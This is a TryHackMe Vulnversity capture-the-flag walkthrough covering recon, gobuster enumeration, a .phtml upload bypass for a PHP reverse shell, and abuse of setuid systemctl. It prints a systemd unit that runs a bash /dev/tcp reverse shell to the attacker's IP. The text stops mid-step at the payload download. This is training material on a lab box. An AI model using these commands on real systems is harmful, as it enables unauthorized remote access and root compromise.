TryHackMe: Vulnversity Writeup

9 min readNov 22, 2023

TryHackMe Vulnversity room is a dynamic platform designed for foundational learning in reconnaissance, web application attacks, and straightforward privilege escalation techniques.

To access the box click on the following link and join room.

TryHackMe | Vulnversity

Learn about active recon, web app attacks and privilege escalation.

tryhackme.com

Check connection

Ping machine IP to check if the connection is established. In my case ping is successful so the connection is established.

Scanning

Let’s start with a nmap scan. Use following command to scan the target IP address.

nmap -sV 10.10.55.131

The above command is performing a scan on target to discover the open ports on the system and determine the versions of services running on those ports.

nmapis the command-line utility used for network exploration and security auditing.
-sVflag instructs nmap to perform a service version detection scan. It attempts to determine the versions of services running on the target ports. By using this flag, nmap will try to identify the specific software and its version running behind each open port on the target machine.
10.10.55.131is the IP address of the target system that nmap will scan for open ports and attempt to identify the versions of services running on those ports.

Based of these results, Let’s answer the questions of Reconnaissance part on tryhackme.

Visit the target IP

Nmap scan results shows that http service is running on port 3333 so Let’s visit target IP address at port 3333 in browser.

The target IP on port 3333 shows a website of some university.

Directory Busting

Let’s start directory busting with gobuster. Use the following command for directory busting.

gobuster dir -u http://10.10.159.61:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

The purpose of the above command is to perform a directory brute-force attack on the target web server port 3333, attempting to discover hidden or unlinked directories or files by trying the entries in the specified wordlist.

gobuster dirSpecifies that the gobuster tool will perform a directory brute-force attack.
-u http://10.10.159.61:3333Specifies the target URL to scan.
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txtSpecifies the wordlist to use for the brute-force attack. In this command, the wordlist used is /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, which contains a list of common directories and files that gobuster will attempt to access on the target URL.

Directory busting results shows few directories. Let’s check them one by one.

We found an upload directory where we can upload files.

Locating directories using Gobuster questions and answers

Now, let’s start directory brute-force on this internal directory to find path of uploaded files.

gobuster dir -u http://10.10.241.44:3333/internal -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 100

The above command aims to perform a directory brute-force attack specifically on the /internal directory of the target web server running at port 3333, trying to identify hidden or unlinked directories or files within that directory using the specified wordlist.

gobuster dirSpecifies that gobuster will perform a directory brute-force attack.
-u http://10.10.241.44:3333/internal Specifies the target URL to scan.
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt Specifies the wordlist to use for the brute-force attack. It's using the wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, containing a list of common directories and files that gobuster will attempt to access within the /internal directory.
-t 100Specifies the number of concurrent threads to use. In this case, it's set to 100, which means gobuster will use 100 threads simultaneously to perform the directory brute-force attack, potentially speeding up the process.

Directory busting results internal directory

Boom! we found uploads directory where we can find the scripts or files which are uploaded.

Compromising Web Server

We have found the page where we can upload files. So, Let’s upload a txt file and intercept the response in burp suite.

From the captured POST request in burpsuite we can see that the target web server is using php. So, we can use php script to compromise the web server. You can download the reverse shell script from the following github link.

GitHub - abdhamza/reverse-shell-php: This repo includes reverse shell executable script in php

This repo includes reverse shell executable script in php - GitHub - abdhamza/reverse-shell-php: This repo includes…

github.com

Change the ip and port on which you want to start the listener. In my case I choose port 3344.

Save the script as reverseshell.php and upload it on target web server.

We got an error message on uploading .php file which means that files with .php extensions are not allowed. Let’s change the extension of script from .php to .phtml and try uploading again.

On uploading .phtml script we got a success message which means the script is uploaded successfully.

Setting up listener

Start listener in the terminal to capture the reverse shell. Use following command for that:

nc -lvp 3344

nc is the command used to work with network connections, often referred to as netcat.
-l tells nc to listen for incoming connections.
-v enables verbose mode, providing more detailed output about the connections.
-p 3344 specifies the port number 3344 to listen on for incoming connections.

Starting listener in terminal on port 3344

Getting reverse shell

We found /uploads/ directory on target IP during directory busting. Now, Let’s move to that path and execute the reverse shell script.

Reverse Shell script on the target web server

We found our uploaded reverseshell.phtml script on the web server. Right click, open in new tab and the script will be executed.

“Boom! Access granted. Congratulations on the achievement!”

Get user flag

Now, let’s find the user flag. Before that let’s enumerate the users by using the following command

cat /etc/passwd

We found a user named bill with the home directory. Let’s enter the bill’s home directory with cd command and list files there.

We found user.txt file. Let’s view contents of user.txt file with cat command and capture the user flag.

Answer the questions on tryhackme room and submit.

Privilege Escalation

For escalating privileges we can identify setuid programs owned by the root user, which could potentially be security risks if they have vulnerabilities that can be exploited by unauthorized users to gain elevated privileges. Let’s use find command to find that programs.

find / -user root -perm -4000 -print 2>/dev/null

find Initiates the search command.
/ Specifies the starting point of the search from the root directory.
-user root Searches for files owned by the user 'root'.
-perm -4000 Looks for files with the setuid bit set. The -4000 flag specifically searches for files with the setuid bit enabled for the user, which means it will find files that have the permission bit set to 4000 (setuid).
-print Prints the location of files that match the criteria.
2>/dev/null Redirects error messages (stderr) to /dev/null, a special device file that discards data. This part ensures that any error messages encountered during the search are not displayed on the terminal.

Finding setuid programs owned by the root user

We found that /bin/systemctl has the setuid bit and is susceptible to exploitation, so let’s abuse it to escalate the privileges from a regular user to root, potentially compromising the entire system. It’s not common that systemctl binary has that kind of permissions. We can create our own service to get the reverse shell. Let’s do it by opening nano editor in terminal.

I just created a simple root service to escalate privileges as shown in the image below. You can copy the the code below. don’t forget to change the IP and port number for listener.

[unit]
Description=root

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.6.114.60/5555 0>&1'

[Install]
WantedBy=multi-user.target

Press Ctrl+x , press y and hit enter key to save and exit nano editor. Let’s check with ls command if the file is there.

Starting HTTP server

Now, Let’s start a simple python http server in the current directory so we can download the malicious service on target system. Use following python command to start the http server.

python -m http.server 80

Downloading malicious service on target system

Let’s move to /tmp directory on target system and download our malicious service there. By default, all users have write permissions to the /tmp directory, allowing them to create, modify, and delete files within it. Use following wget command to download the file.